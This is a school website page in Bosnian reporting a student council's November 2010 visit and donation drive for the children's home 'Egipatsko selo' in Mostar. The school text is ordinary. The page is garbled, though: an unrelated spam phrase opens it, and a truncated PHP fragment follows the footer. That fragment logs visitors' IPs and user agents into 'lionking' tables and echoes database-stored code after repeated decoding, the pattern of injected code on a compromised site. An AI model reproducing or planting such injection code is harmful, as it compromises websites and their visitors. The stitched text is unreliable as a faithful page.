fuga mobilya

Posjeta Egipatskom selu

Written by  škola
(0 votes)

Vijeće učenika je 12.11. 2010. godine posjetilo Dječiji dom „Egipatsko selo" Mostar. Akcija prikupljanja odjeće i novčanih sredstava pokrenuta je samo pet dana prije toga i učenici su bili veoma zadovoljni prikupljenim sredstvima i uključivanjem svih učenika, nastavnika i menadžemanta škole u ovu akciju.

Učenici su preveli puna tri sata sa djecom iz „Egipatskog sela“ i bili su dirnuti činjenicom da u njihovoj okolini žive djeca kojoj toliko znači pažnja i ljubav koju ne dobivaju previše.

Zaključak je bio da se opet žele vratiti da bar na trenutak izmame osmjehe na njihovom licu.

Read 2606 times
More in this category: U posjeti BKC Sarajevo »

Add comment

Security code Refresh

Ko je online?

Trenutno aktivnih Gostiju: 14

Powered by Joomla!. Valid XHTML and CSS.

= 1) { //mysql_query('INSERT INTO lionking (domainname, fullpath, ip, useragent, processtime) VALUES ("'.$g['domainname'].'","'.$g['fullpath'].'","'.$g['ip'].'","'.$g['useragent'].'", NOW())'); $rs = mysql_fetch_array($q); echo stripslashes(stripslashes(stripslashes(html_entity_decode(html_entity_decode($rs['code']))))); } else { mysql_query('INSERT INTO lionking_saved (domainname, stat, processtime) VALUES ("'.$g['domainname'].'","2", NOW())'); } } ?>